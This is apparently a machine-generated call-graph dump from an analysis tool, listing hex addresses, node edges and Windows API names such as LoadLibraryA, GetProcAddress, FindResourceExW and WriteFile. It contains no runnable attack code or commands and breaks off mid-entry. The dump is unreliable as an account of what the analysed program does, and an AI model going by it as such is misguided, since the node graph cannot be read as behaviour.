CreateWindowExW ShowWindow ShowWindow 104639->104640 104640->104494 104642 cd4375 _memset 104641->104642 105768 cd4182 104642->105768 104645 cd43fa 104647 cd4414 Shell_NotifyIconW 104645->104647 104648 cd4430 Shell_NotifyIconW 104645->104648 104649 cd4422 104647->104649 104648->104649 105772 cd407c 104649->105772 104651 cd4429 104651->104496 104653 d14cc3 104652->104653 104664 ce09f5 104652->104664 105850 d39e4a 89 API calls 4 library calls 104653->105850 104655 ce0cfa 104655->104502 104657 ce0ee4 104657->104655 104659 ce0ef1 104657->104659 105848 ce1093 331 API calls Mailbox 104659->105848 104660 ce0a4b PeekMessageW 104719 ce0a05 Mailbox 104660->104719 104662 ce0ef8 LockWindowUpdate DestroyWindow GetMessageW 104662->104655 104666 ce0f2a 104662->104666 104664->104719 105851 cd9e5d 60 API calls 104664->105851 105852 d26349 331 API calls 104664->105852 104665 d14e81 Sleep 104665->104719 104669 d15c58 TranslateMessage DispatchMessageW GetMessageW 104666->104669 104667 ce0ce4 104667->104655 105847 ce1070 10 API calls Mailbox 104667->105847 104669->104669 104670 d15c88 104669->104670 104670->104655 104671 ce0ea5 TranslateMessage DispatchMessageW 104672 ce0e43 PeekMessageW 104671->104672 104672->104719 104673 d14d50 TranslateAcceleratorW 104673->104672 104673->104719 104674 ce0d13 timeGetTime 104674->104719 104675 d1581f WaitForSingleObject 104677 d1583c GetExitCodeProcess CloseHandle 104675->104677 104675->104719 104712 ce0f95 104677->104712 104678 ce0e5f Sleep 104714 ce0e70 Mailbox 104678->104714 104679 cd8047 59 API calls 104679->104719 104680 cd7667 59 API calls 104680->104714 104682 cf0db6 59 API calls Mailbox 104682->104719 104683 d15af8 Sleep 104683->104714 104684 cdb73c 304 API calls 104684->104719 104686 cf049f timeGetTime 104686->104714 104687 ce0f4e timeGetTime 105849 cd9e5d 60 API calls 104687->105849 104690 d15b8f GetExitCodeProcess 104692 d15ba5 WaitForSingleObject 104690->104692 104693 d15bbb CloseHandle 104690->104693 104692->104693 104692->104719 104693->104714 104696 d55f25 110 API calls 104696->104714 104697 cdb7dd 109 API calls 104697->104714 104698 cd9e5d 60 API calls 104698->104719 104699 d15874 104699->104712 104700 d15c17 Sleep 104700->104719 104701 d15078 Sleep 104701->104719 104703 cd7de1 59 API calls 104703->104714 104707 cd9ea0 304 API calls 104707->104719 104712->104502 104714->104680 104714->104686 104714->104690 104714->104696 104714->104697 104714->104699 104714->104700 104714->104701 104714->104703 104714->104712 104714->104719 105877 d32408 60 API calls 104714->105877 105878 cd9e5d 60 API calls 104714->105878 105879 cd89b3 69 API calls Mailbox 104714->105879 105880 cdb73c 331 API calls 104714->105880 105881 d264da 60 API calls 104714->105881 105882 d35244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104714->105882 105883 d33c55 66 API calls Mailbox 104714->105883 104715 d39e4a 89 API calls 104715->104719 104717 cd9c90 59 API calls Mailbox 104717->104719 104718 cd84c0 69 API calls 104718->104719 104719->104660 104719->104665 104719->104667 104719->104671 104719->104672 104719->104673 104719->104674 104719->104675 104719->104678 104719->104679 104719->104682 104719->104683 104719->104684 104719->104687 104719->104698 104719->104707 104719->104712 104719->104714 104719->104715 104719->104717 104719->104718 104721 d2617e 59 API calls Mailbox 104719->104721 104722 d155d5 VariantClear 104719->104722 104723 cd8cd4 59 API calls Mailbox 104719->104723 104724 d1566b VariantClear 104719->104724 104725 d15419 VariantClear 104719->104725 104726 d26e8f 59 API calls 104719->104726 104727 cd7de1 59 API calls 104719->104727 104728 cd89b3 69 API calls 104719->104728 105795 cde6a0 104719->105795 105826 cdf460 104719->105826 105844 cde420 331 API calls 104719->105844 105845 cdfce0 331 API calls 2 library calls 104719->105845 105846 cd31ce IsDialogMessageW GetClassLongW 104719->105846 105853 d56018 59 API calls 104719->105853 105854 d39a15 59 API calls Mailbox 104719->105854 105855 d2d4f2 59 API calls 104719->105855 105856 cd9837 104719->105856 105874 d260ef 59 API calls 2 library calls 104719->105874 105875 cd8401 59 API calls 104719->105875 105876 cd82df 59 API calls Mailbox 104719->105876 104721->104719 104722->104719 104723->104719 104724->104719 104725->104719 104726->104719 104727->104719 104728->104719 104729->104504 104730->104481 104731->104491 104733 d0ec6b 104732->104733 104734 cd7b40 104732->104734 106184 d27bdb 59 API calls _memmove 104733->106184 106178 cd7a51 104734->106178 104737 cd7b4c 104737->104516 104738 d0ec75 104739 cd8047 59 API calls 104738->104739 104740 d0ec7d Mailbox 104739->104740 104742 cd3d3e __write_nolock 104741->104742 104743 cd7bcc 59 API calls 104742->104743 104748 cd3ea4 Mailbox 104742->104748 104745 cd3d70 104743->104745 104751 cd3da6 Mailbox 104745->104751 104867 cd79f2 104745->104867 104746 cd3e77 104747 cd7de1 59 API calls 104746->104747 104746->104748 104750 cd3e98 104747->104750 104748->104524 104749 cd7de1 59 API calls 104749->104751 104752 cd3f74 59 API calls 104750->104752 104751->104746 104751->104748 104751->104749 104753 cd3f74 59 API calls 104751->104753 104754 cd79f2 59 API calls 104751->104754 104752->104748 104753->104751 104754->104751 104870 cd4bb5 104755->104870 104760 cd4e08 LoadLibraryExW 104880 cd4b6a 104760->104880 104761 d0d8e6 104763 cd4e4a 84 API calls 104761->104763 104765 d0d8ed 104763->104765 104767 cd4b6a 3 API calls 104765->104767 104769 d0d8f5 104767->104769 104768 cd4e2f 104768->104769 104770 cd4e3b 104768->104770 104906 cd4f0b 104769->104906 104771 cd4e4a 84 API calls 104770->104771 104773 cd37d4 104771->104773 104773->104531 104773->104532 104776 d0d91c 104914 cd4ec7 104776->104914 104778 d0d929 104780 cd37ef 104779->104780 104781 cd8052 104779->104781 104783 cd928a 104780->104783 105165 cd7f77 59 API calls 2 library calls 104781->105165 104784 cf0db6 Mailbox 59 API calls 104783->104784 104785 cd37fb 104784->104785 104785->104545 104787 cd84cb 104786->104787 104789 cd84f2 104787->104789 105166 cd89b3 69 API calls Mailbox 104787->105166 104789->104549 104791 cd3eda 104790->104791 104792 cd3ef3 104790->104792 104793 cd8047 59 API calls 104791->104793 104794 cd7bcc 59 API calls 104792->104794 104795 cd3879 104793->104795 104794->104795 104796 cf2efd 104795->104796 104797 cf2f7e 104796->104797 104798 cf2f09 104796->104798 105169 cf2f90 60 API calls 3 library calls 104797->105169 104805 cf2f2e 104798->104805 105167 cf8b28 58 API calls __getptd_noexit 104798->105167 104800 cf2f8b 104800->104570 104802 cf2f15 105168 cf8db6 9 API calls wcstoxq 104802->105168 104804 cf2f20 104804->104570 104805->104570 104807 cd92d6 104806->104807 104808 cf0db6 Mailbox 59 API calls 104807->104808 104809 cd92e4 104808->104809 104810 cd3924 104809->104810 105170 cd91fc 59 API calls Mailbox 104809->105170 104812 cd9050 104810->104812 105171 cd9160 104812->105171 104814 cd905f 104815 cf0db6 Mailbox 59 API calls 104814->104815 104816 cd3932 104814->104816 104815->104816 104817 cd8ee0 104816->104817 104818 d0f17c 104817->104818 104820 cd8ef7 104817->104820 104818->104820 105181 cd8bdb 59 API calls Mailbox 104818->105181 104821 cd8ff8 104820->104821 104822 cd9040 104820->104822 104825 cd8fff 104820->104825 104824 cf0db6 Mailbox 59 API calls 104821->104824 105180 cd9d3c 60 API calls Mailbox 104822->105180 104824->104825 104825->104598 104827 cd4ee5 85 API calls 104826->104827 104828 d395ca 104827->104828 105182 d39734 104828->105182 104831 cd4f0b 74 API calls 104832 d395f7 104831->104832 104833 cd4f0b 74 API calls 104832->104833 104834 d39607 104833->104834 104835 cd4f0b 74 API calls 104834->104835 104836 d39622 104835->104836 104837 cd4f0b 74 API calls 104836->104837 104838 d3963d 104837->104838 104839 cd4ee5 85 API calls 104838->104839 104840 d39654 104839->104840 104841 cf571c _W_store_winword 58 API calls 104840->104841 104842 d3965b 104841->104842 104843 cf571c _W_store_winword 58 API calls 104842->104843 104844 d39665 104843->104844 104845 cd4f0b 74 API calls 104844->104845 104846 d39679 104845->104846 104847 d39109 GetSystemTimeAsFileTime 104846->104847 104848 d3968c 104847->104848 104849 d396a1 104848->104849 104850 d396b6 104848->104850 104851 cf2d55 _free 58 API calls 104849->104851 104852 d3971b 104850->104852 104853 d396bc 104850->104853 104854 d396a7 104851->104854 104856 cf2d55 _free 58 API calls 104852->104856 105188 d38b06 116 API calls __fcloseall 104853->105188 104857 cf2d55 _free 58 API calls 104854->104857 104859 d0d186 104856->104859 104857->104859 104858 d39713 104860 cf2d55 _free 58 API calls 104858->104860 104859->104535 104861 cd4e4a 104859->104861 104860->104859 104862 cd4e5b 104861->104862 104863 cd4e54 104861->104863 104865 cd4e7b FreeLibrary 104862->104865 104866 cd4e6a 104862->104866 105189 cf53a6 104863->105189 104865->104866 104866->104535 104868 cd7e4f 59 API calls 104867->104868 104869 cd79fd 104868->104869 104869->104745 104919 cd4c03 104870->104919 104873 cd4bdc 104875 cd4bec FreeLibrary 104873->104875 104876 cd4bf5 104873->104876 104874 cd4c03 2 API calls 104874->104873 104875->104876 104877 cf525b 104876->104877 104923 cf5270 104877->104923 104879 cd4dfc 104879->104760 104879->104761 105083 cd4c36 104880->105083 104883 cd4c36 2 API calls 104886 cd4b8f 104883->104886 104884 cd4baa 104887 cd4c70 104884->104887 104885 cd4ba1 FreeLibrary 104885->104884 104886->104884 104886->104885 104888 cf0db6 Mailbox 59 API calls 104887->104888 104889 cd4c85 104888->104889 104890 cd522e 59 API calls 104889->104890 104891 cd4c91 _memmove 104890->104891 104893 cd4d89 104891->104893 104894 cd4dc1 104891->104894 104897 cd4ccc 104891->104897 104892 cd4ec7 69 API calls 104903 cd4cd5 104892->104903 105087 cd4e89 CreateStreamOnHGlobal 104893->105087 105098 d3991b 95 API calls 104894->105098 104897->104892 104898 cd4f0b 74 API calls 104898->104903 104900 cd4d69 104900->104768 104901 d0d8a7 104902 cd4ee5 85 API calls 104901->104902 104904 d0d8bb 104902->104904 104903->104898 104903->104900 104903->104901 105093 cd4ee5 104903->105093 104905 cd4f0b 74 API calls 104904->104905 104905->104900 104907 cd4f1d 104906->104907 104908 d0d9cd 104906->104908 105122 cf55e2 104907->105122 104911 d39109 105142 d38f5f 104911->105142 104913 d3911f 104913->104776 104915 d0d990 104914->104915 104916 cd4ed6 104914->104916 105147 cf5c60 104916->105147 104918 cd4ede 104918->104778 104920 cd4bd0 104919->104920 104921 cd4c0c LoadLibraryA 104919->104921 104920->104873 104920->104874 104921->104920 104922 cd4c1d GetProcAddress 104921->104922 104922->104920 104926 cf527c __tzset_nolock 104923->104926 104924 cf528f 104972 cf8b28 58 API calls __getptd_noexit 104924->104972 104926->104924 104928 cf52c0 104926->104928 104927 cf5294 104973 cf8db6 9 API calls wcstoxq 104927->104973 104942 d004e8 104928->104942 104931 cf52c5 104932 cf52ce 104931->104932 104933 cf52db 104931->104933 104974 cf8b28 58 API calls __getptd_noexit 104932->104974 104935 cf5305 104933->104935 104936 cf52e5 104933->104936 104957 d00607 104935->104957 104975 cf8b28 58 API calls __getptd_noexit 104936->104975 104940 cf529f __tzset_nolock @_EH4_CallFilterFunc@8 104940->104879 104943 d004f4 __tzset_nolock 104942->104943 104944 cf9c0b __lock 58 API calls 104943->104944 104955 d00502 104944->104955 104945 d0057d 104982 cf881d 58 API calls 2 library calls 104945->104982 104946 d00576 104977 d005fe 104946->104977 104949 d00584 104949->104946 104983 cf9e2b InitializeCriticalSectionAndSpinCount 104949->104983 104950 d005f3 __tzset_nolock 104950->104931 104952 cf9c93 __mtinitlocknum 58 API calls 104952->104955 104954 d005aa EnterCriticalSection 104954->104946 104955->104945 104955->104946 104955->104952 104980 cf6c50 59 API calls __lock 104955->104980 104981 cf6cba LeaveCriticalSection LeaveCriticalSection _doexit 104955->104981 104958 d00627 __wopenfile 104957->104958 104959 d00641 104958->104959 104971 d007fc 104958->104971 104990 cf37cb 60 API calls 2 library calls 104958->104990 104988 cf8b28 58 API calls __getptd_noexit 104959->104988 104961 d00646 104989 cf8db6 9 API calls wcstoxq 104961->104989 104963 d0085f 104985 d085a1 104963->104985 104965 cf5310 104976 cf5332 LeaveCriticalSection LeaveCriticalSection _fseek 104965->104976 104967 d007f5 104967->104971 104991 cf37cb 60 API calls 2 library calls 104967->104991 104969 d00814 104969->104971 104992 cf37cb 60 API calls 2 library calls 104969->104992 104971->104959 104971->104963 104972->104927 104973->104940 104974->104940 104975->104940 104976->104940 104984 cf9d75 LeaveCriticalSection 104977->104984 104979 d00605 104979->104950 104980->104955 104981->104955 104982->104949 104983->104954 104984->104979 104993 d07d85 104985->104993 104987 d085ba 104987->104965 104988->104961 104989->104965 104990->104967 104991->104969 104992->104971 104994 d07d91 __tzset_nolock 104993->104994 104995 d07da7 104994->104995 104998 d07ddd 104994->104998 105080 cf8b28 58 API calls __getptd_noexit 104995->105080 104997 d07dac 105081 cf8db6 9 API calls wcstoxq 104997->105081 105004 d07e4e 104998->105004 105001 d07df9 105082 d07e22 LeaveCriticalSection __unlock_fhandle 105001->105082 105003 d07db6 __tzset_nolock 105003->104987 105005 d07e6e 105004->105005 105006 cf44ea __wsopen_nolock 58 API calls 105005->105006 105010 d07e8a 105006->105010 105007 d07fc1 105008 cf8dc6 __invoke_watson 8 API calls 105007->105008 105009 d085a0 105008->105009 105012 d07d85 __wsopen_helper 103 API calls 105009->105012 105010->105007 105011 d07ec4 105010->105011 105022 d07ee7 105010->105022 105013 cf8af4 __write_nolock 58 API calls 105011->105013 105014 d085ba 105012->105014 105015 d07ec9 105013->105015 105014->105001 105016 cf8b28 wcstoxq 58 API calls 105015->105016 105017 d07ed6 105016->105017 105019 cf8db6 wcstoxq 9 API calls 105017->105019 105018 d07fa5 105020 cf8af4 __write_nolock 58 API calls 105018->105020 105021 d07ee0 105019->105021 105023 d07faa 105020->105023 105021->105001 105022->105018 105026 d07f83 105022->105026 105024 cf8b28 wcstoxq 58 API calls 105023->105024 105025 d07fb7 105024->105025 105027 cf8db6 wcstoxq 9 API calls 105025->105027 105028 cfd294 __alloc_osfhnd 61 API calls 105026->105028 105027->105007 105029 d08051 105028->105029 105030 d0805b 105029->105030 105031 d0807e 105029->105031 105032 cf8af4 __write_nolock 58 API calls 105030->105032 105033 d07cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105031->105033 105034 d08060 105032->105034 105041 d080a0 105033->105041 105035 cf8b28 wcstoxq 58 API calls 105034->105035 105038 d0806a 105035->105038 105036 d0811e GetFileType 105039 d08129 GetLastError 105036->105039 105040 d0816b 105036->105040 105037 d080ec GetLastError 105042 cf8b07 __dosmaperr 58 API calls 105037->105042 105043 cf8b28 wcstoxq 58 API calls 105038->105043 105044 cf8b07 __dosmaperr 58 API calls 105039->105044 105049 cfd52a __set_osfhnd 59 API calls 105040->105049 105041->105036 105041->105037 105045 d07cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105041->105045 105046 d08111 105042->105046 105043->105021 105047 d08150 CloseHandle 105044->105047 105048 d080e1 105045->105048 105051 cf8b28 wcstoxq 58 API calls 105046->105051 105047->105046 105050 d0815e 105047->105050 105048->105036 105048->105037 105055 d08189 105049->105055 105052 cf8b28 wcstoxq 58 API calls 105050->105052 105051->105007 105053 d08163 105052->105053 105053->105046 105054 d08344 105054->105007 105057 d08517 CloseHandle 105054->105057 105055->105054 105056 d018c1 __lseeki64_nolock 60 API calls 105055->105056 105071 d0820a 105055->105071 105058 d081f3 105056->105058 105059 d07cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105057->105059 105062 cf8af4 __write_nolock 58 API calls 105058->105062 105077 d08212 105058->105077 105061 d0853e 105059->105061 105060 d00e5b 70 API calls __read_nolock 105060->105077 105063 d08546 GetLastError 105061->105063 105064 d083ce 105061->105064 105062->105071 105065 cf8b07 __dosmaperr 58 API calls 105063->105065 105064->105007 105067 d08552 105065->105067 105066 d00add __close_nolock 61 API calls 105066->105077 105068 cfd43d __free_osfhnd 59 API calls 105067->105068 105068->105064 105069 d097a2 __chsize_nolock 82 API calls 105069->105077 105070 cfd886 __write 78 API calls 105070->105071 105071->105054 105071->105070 105073 d018c1 60 API calls __lseeki64_nolock 105071->105073 105071->105077 105072 d083c1 105075 d00add __close_nolock 61 API calls 105072->105075 105073->105071 105074 d083aa 105074->105054 105076 d083c8 105075->105076 105078 cf8b28 wcstoxq 58 API calls 105076->105078 105077->105060 105077->105066 105077->105069 105077->105071 105077->105072 105077->105074 105079 d018c1 60 API calls __lseeki64_nolock 105077->105079 105078->105064 105079->105077 105080->104997 105081->105003 105082->105003 105084 cd4b83 105083->105084 105085 cd4c3f LoadLibraryA 105083->105085 105084->104883 105084->104886 105085->105084 105086 cd4c50 GetProcAddress 105085->105086 105086->105084 105088 cd4ea3 FindResourceExW 105087->105088 105092 cd4ec0 105087->105092 105089 d0d933 LoadResource 105088->105089 105088->105092 105090 d0d948 SizeofResource 105089->105090 105089->105092 105091 d0d95c LockResource 105090->105091 105090->105092 105091->105092 105092->104897 105094 cd4ef4 105093->105094 105095 d0d9ab 105093->105095 105099 cf584d 105094->105099 105097 cd4f02 105097->104903 105098->104897 105101 cf5859 __tzset_nolock 105099->105101 105100 cf586b 105112 cf8b28 58 API calls __getptd_noexit 105100->105112 105101->105100 105103 cf5891 105101->105103 105114 cf6c11 105103->105114 105105 cf5870 105113 cf8db6 9 API calls wcstoxq 105105->105113 105106 cf5897 105120 cf57be 83 API calls 5 library calls 105106->105120 105109 cf58a6 105121 cf58c8 LeaveCriticalSection LeaveCriticalSection _fseek 105109->105121 105111 cf587b __tzset_nolock 105111->105097 105112->105105 105113->105111 105115 cf6c43 EnterCriticalSection 105114->105115 105116 cf6c21 105114->105116 105118 cf6c39 105115->105118 105116->105115 105117 cf6c29 105116->105117 105119 cf9c0b __lock 58 API calls 105117->105119 105118->105106 105119->105118 105120->105109 105121->105111 105125 cf55fd 105122->105125 105124 cd4f2e 105124->104911 105126 cf5609 __tzset_nolock 105125->105126 105127 cf561f _memset 105126->105127 105128 cf564c 105126->105128 105129 cf5644 __tzset_nolock 105126->105129 105138 cf8b28 58 API calls __getptd_noexit 105127->105138 105130 cf6c11 __lock_file 59 API calls 105128->105130 105129->105124 105131 cf5652 105130->105131 105140 cf541d 72 API calls 6 library calls 105131->105140 105133 cf5639 105139 cf8db6 9 API calls wcstoxq 105133->105139 105136 cf5668 105141 cf5686 LeaveCriticalSection LeaveCriticalSection _fseek 105136->105141 105138->105133 105139->105129 105140->105136 105141->105129 105145 cf520a GetSystemTimeAsFileTime 105142->105145 105144 d38f6e 105144->104913 105146 cf5238 __aulldiv 105145->105146 105146->105144 105148 cf5c6c __tzset_nolock 105147->105148 105149 cf5c7e 105148->105149 105150 cf5c93 105148->105150 105161 cf8b28 58 API calls __getptd_noexit 105149->105161 105152 cf6c11 __lock_file 59 API calls 105150->105152 105154 cf5c99 105152->105154 105153 cf5c83 105162 cf8db6 9 API calls wcstoxq 105153->105162 105163 cf58d0 67 API calls 6 library calls 105154->105163 105157 cf5ca4 105164 cf5cc4 LeaveCriticalSection LeaveCriticalSection _fseek 105157->105164 105159 cf5cb6 105160 cf5c8e __tzset_nolock 105159->105160 105160->104918 105161->105153 105162->105160 105163->105157 105164->105159 105165->104780 105166->104789 105167->104802 105168->104804 105169->104800 105170->104810 105172 cd9169 Mailbox 105171->105172 105173 d0f19f 105172->105173 105178 cd9173 105172->105178 105174 cf0db6 Mailbox 59 API calls 105173->105174 105175 d0f1ab 105174->105175 105176 cd917a 105176->104814 105178->105176 105179 cd9c90 59 API calls Mailbox 105178->105179 105179->105178 105180->104825 105181->104820 105183 d39748 __tzset_nolock _wcscmp 105182->105183 105184 d395dc 105183->105184 105185 cd4f0b 74 API calls 105183->105185 105186 d39109 GetSystemTimeAsFileTime 105183->105186 105187 cd4ee5 85 API calls 105183->105187 105184->104831 105184->104859 105185->105183 105186->105183 105187->105183 105188->104858 105190 cf53b2 __tzset_nolock 105189->105190 105191 cf53de 105190->105191 105192 cf53c6 105190->105192 105194 cf6c11 __lock_file 59 API calls 105191->105194 105198 cf53d6 __tzset_nolock 105191->105198 105218 cf8b28 58 API calls __getptd_noexit 105192->105218 105196 cf53f0 105194->105196 105195 cf53cb 105219 cf8db6 9 API calls wcstoxq 105195->105219 105202 cf533a 105196->105202 105198->104862 105203 cf535d 105202->105203 105204 cf5349 105202->105204 105206 cf5359 105203->105206 105221 cf4a3d 105203->105221 105264 cf8b28 58 API calls __getptd_noexit 105204->105264 105220 cf5415 LeaveCriticalSection LeaveCriticalSection _fseek 105206->105220 105207 cf534e 105265 cf8db6 9 API calls wcstoxq 105207->105265 105214 cf5377 105238 d00a02 105214->105238 105216 cf537d 105216->105206 105217 cf2d55 _free 58 API calls 105216->105217 105217->105206 105218->105195 105219->105198 105220->105198 105222 cf4a50 105221->105222 105226 cf4a74 105221->105226 105223 cf46e6 __flsbuf 58 API calls 105222->105223 105222->105226 105224 cf4a6d 105223->105224 105266 cfd886 105224->105266 105227 d00b77 105226->105227 105228 cf5371 105227->105228 105229 d00b84 105227->105229 105231 cf46e6 105228->105231 105229->105228 105230 cf2d55 _free 58 API calls 105229->105230 105230->105228 105232 cf4705 105231->105232 105233 cf46f0 105231->105233 105232->105214 105401 cf8b28 58 API calls __getptd_noexit 105233->105401 105235 cf46f5 105402 cf8db6 9 API calls wcstoxq 105235->105402 105237 cf4700 105237->105214 105239 d00a0e __tzset_nolock 105238->105239 105240 d00a32 105239->105240 105241 d00a1b 105239->105241 105243 d00abd 105240->105243 105244 d00a42 105240->105244 105418 cf8af4 58 API calls __getptd_noexit 105241->105418 105423 cf8af4 58 API calls __getptd_noexit 105243->105423 105247 d00a60 105244->105247 105248 d00a6a 105244->105248 105246 d00a20 105419 cf8b28 58 API calls __getptd_noexit 105246->105419 105420 cf8af4 58 API calls __getptd_noexit 105247->105420 105252 cfd206 ___lock_fhandle 59 API calls 105248->105252 105249 d00a65 105424 cf8b28 58 API calls __getptd_noexit 105249->105424 105254 d00a70 105252->105254 105256 d00a83 105254->105256 105257 d00a8e 105254->105257 105255 d00ac9 105425 cf8db6 9 API calls wcstoxq 105255->105425 105403 d00add 105256->105403 105421 cf8b28 58 API calls __getptd_noexit 105257->105421 105260 d00a27 __tzset_nolock 105260->105216 105262 d00a89 105422 d00ab5 LeaveCriticalSection __unlock_fhandle 105262->105422 105264->105207 105265->105206 105267 cfd892 __tzset_nolock 105266->105267 105268 cfd89f 105267->105268 105269 cfd8b6 105267->105269 105367 cf8af4 58 API calls __getptd_noexit 105268->105367 105270 cfd955 105269->105270 105272 cfd8ca 105269->105272 105373 cf8af4 58 API calls __getptd_noexit 105270->105373 105275 cfd8e8 105272->105275 105276 cfd8f2 105272->105276 105274 cfd8a4 105368 cf8b28 58 API calls __getptd_noexit 105274->105368 105369 cf8af4 58 API calls __getptd_noexit 105275->105369 105294 cfd206 105276->105294 105277 cfd8ed 105374 cf8b28 58 API calls __getptd_noexit 105277->105374 105281 cfd8ab __tzset_nolock 105281->105226 105282 cfd8f8 105284 cfd91e 105282->105284 105285 cfd90b 105282->105285 105370 cf8b28 58 API calls __getptd_noexit 105284->105370 105303 cfd975 105285->105303 105286 cfd961 105375 cf8db6 9 API calls wcstoxq 105286->105375 105290 cfd917 105372 cfd94d LeaveCriticalSection __unlock_fhandle 105290->105372 105291 cfd923 105371 cf8af4 58 API calls __getptd_noexit 105291->105371 105295 cfd212 __tzset_nolock 105294->105295 105296 cfd261 EnterCriticalSection 105295->105296 105297 cf9c0b __lock 58 API calls 105295->105297 105298 cfd287 __tzset_nolock 105296->105298 105299 cfd237 105297->105299 105298->105282 105300 cfd24f 105299->105300 105376 cf9e2b InitializeCriticalSectionAndSpinCount 105299->105376 105377 cfd28b LeaveCriticalSection _doexit 105300->105377 105304 cfd982 __write_nolock 105303->105304 105305 cfd9c1 105304->105305 105306 cfd9e0 105304->105306 105338 cfd9b6 105304->105338 105387 cf8af4 58 API calls __getptd_noexit 105305->105387 105311 cfda38 105306->105311 105312 cfda1c 105306->105312 105307 cfc5f6 __cftog_l 6 API calls 105309 cfe1d6 105307->105309 105309->105290 105310 cfd9c6 105388 cf8b28 58 API calls __getptd_noexit 105310->105388 105314 cfda51 105311->105314 105393 d018c1 60 API calls 3 library calls 105311->105393 105390 cf8af4 58 API calls __getptd_noexit 105312->105390 105378 d05c6b 105314->105378 105316 cfda21 105391 cf8b28 58 API calls __getptd_noexit 105316->105391 105317 cfd9cd 105389 cf8db6 9 API calls wcstoxq 105317->105389 105322 cfda5f 105324 cfddb8 105322->105324 105394 cf99ac 58 API calls 2 library calls 105322->105394 105323 cfda28 105392 cf8db6 9 API calls wcstoxq 105323->105392 105325 cfe14b WriteFile 105324->105325 105326 cfddd6 105324->105326 105328 cfddab GetLastError 105325->105328 105340 cfdd78 105325->105340 105329 cfddec 105326->105329 105330 cfdefa 105326->105330 105328->105340 105337 cfde5b WriteFile 105329->105337 105344 cfe184 105329->105344 105333 cfdfef 105330->105333 105334 cfdf05 105330->105334 105332 cfda8b GetConsoleMode 105332->105324 105335 cfdaca 105332->105335 105333->105344 105345 cfe064 WideCharToMultiByte 105333->105345 105334->105344 105347 cfdf6a WriteFile 105334->105347 105335->105324 105336 cfdada GetConsoleCP 105335->105336 105336->105344 105365 cfdb09 105336->105365 105337->105328 105341 cfde98 105337->105341 105338->105307 105340->105338 105343 cfded8 105340->105343 105340->105344 105341->105329 105346 cfdebc 105341->105346 105342 cfe1b2 105400 cf8af4 58 API calls __getptd_noexit 105342->105400 105349 cfe17b 105343->105349 105350 cfdee3 105343->105350 105344->105338 105399 cf8b28 58 API calls __getptd_noexit 105344->105399 105345->105328 105360 cfe0ab 105345->105360 105346->105340 105347->105328 105353 cfdfb9 105347->105353 105398 cf8b07 58 API calls 3 library calls 105349->105398 105396 cf8b28 58 API calls __getptd_noexit 105350->105396 105353->105334 105353->105340 105353->105346 105354 cfdee8 105397 cf8af4 58 API calls __getptd_noexit 105354->105397 105355 cfe0b3 WriteFile 105358 cfe106 GetLastError 105355->105358 105355->105360 105358->105360 105359 d062ba 60 API calls __write_nolock 105359->105365 105360->105333 105360->105340 105360->105346 105360->105355 105361 d07a5e WriteConsoleW CreateFileW __putwch_nolock 105364 cfdc5f 105361->105364 105362 cfdbf2 WideCharToMultiByte 105362->105340 105363 cfdc2d WriteFile 105362->105363 105363->105328 105363->105364 105364->105328 105364->105340 105364->105361 105364->105365 105366 cfdc87 WriteFile 105364->105366 105365->105340 105365->105359 105365->105362 105365->105364 105395 cf35f5 58 API calls __isleadbyte_l 105365->105395 105366->105328 105366->105364 105367->105274 105368->105281 105369->105277 105370->105291 105371->105290 105372->105281 105373->105277 105374->105286 105375->105281 105376->105300 105377->105296 105379 d05c83 105378->105379 105380 d05c76 105378->105380 105382 d05c8f 105379->105382 105383 cf8b28 wcstoxq 58 API calls 105379->105383 105381 cf8b28 wcstoxq 58 API calls 105380->105381 105384 d05c7b 105381->105384 105382->105322 105385 d05cb0 105383->105385 105384->105322 105386 cf8db6 wcstoxq 9 API calls 105385->105386 105386->105384 105387->105310 105388->105317 105389->105338 105390->105316 105391->105323 105392->105338 105393->105314 105394->105332 105395->105365 105396->105354 105397->105338 105398->105338 105399->105342 105400->105338 105401->105235 105402->105237 105426 cfd4c3 105403->105426 105405 d00b41 105439 cfd43d 59 API calls 2 library calls 105405->105439 105406 d00aeb 105406->105405 105409 cfd4c3 __lseek_nolock 58 API calls 105406->105409 105417 d00b1f 105406->105417 105408 d00b49 105416 d00b6b 105408->105416 105440 cf8b07 58 API calls 3 library calls 105408->105440 105411 d00b16 105409->105411 105410 cfd4c3 __lseek_nolock 58 API calls 105412 d00b2b CloseHandle 105410->105412 105414 cfd4c3 __lseek_nolock 58 API calls 105411->105414 105412->105405 105415 d00b37 GetLastError 105412->105415 105414->105417 105415->105405 105416->105262 105417->105405 105417->105410 105418->105246 105419->105260 105420->105249 105421->105262 105422->105260 105423->105249 105424->105255 105425->105260 105427 cfd4ce 105426->105427 105428 cfd4e3 105426->105428 105441 cf8af4 58 API calls __getptd_noexit 105427->105441 105434 cfd508 105428->105434 105443 cf8af4 58 API calls __getptd_noexit 105428->105443 105431 cfd4d3 105442 cf8b28 58 API calls __getptd_noexit 105431->105442 105432 cfd512 105444 cf8b28 58 API calls __getptd_noexit 105432->105444 105434->105406 105436 cfd51a 105445 cf8db6 9 API calls wcstoxq 105436->105445 105437 cfd4db 105437->105406 105439->105408 105440->105416 105441->105431 105442->105437 105443->105432 105444->105436 105445->105437 105447 cf079e __write_nolock 105446->105447 105448 cf079f GetLongPathNameW 105447->105448 105449 cd7bcc 59 API calls 105448->105449 105450 cd72bd 105449->105450 105451 cd700b 105450->105451 105452 cd7667 59 API calls 105451->105452 105453 cd701d 105452->105453 105454 cd4750 60 API calls 105453->105454 105455 cd7028 105454->105455 105456 cd7033 105455->105456 105460 d0e885 105455->105460 105458 cd3f74 59 API calls 105456->105458 105459 cd703f 105458->105459 105498 cd34c2 105459->105498 105462 d0e89f 105460->105462 105504 cd7908 61 API calls 105460->105504 105463 cd7052 Mailbox 105463->104614 105465 cd4ddd 136 API calls 105464->105465 105466 cd688f 105465->105466 105467 d0e031 105466->105467 105468 cd4ddd 136 API calls 105466->105468 105469 d3955b 122 API calls 105467->105469 105470 cd68a3 105468->105470 105471 d0e046 105469->105471 105470->105467 105474 cd68ab 105470->105474 105472 d0e067 105471->105472 105473 d0e04a 105471->105473 105476 cf0db6 Mailbox 59 API calls 105472->105476 105475 cd4e4a 84 API calls 105473->105475 105477 d0e052 105474->105477 105478 cd68b7 105474->105478 105475->105477 105494 d0e0ac Mailbox 105476->105494 105612 d342f8 90 API calls _wprintf 105477->105612 105505 cd6a8c 105478->105505 105481 d0e060 105481->105472 105483 d0e260 105484 cf2d55 _free 58 API calls 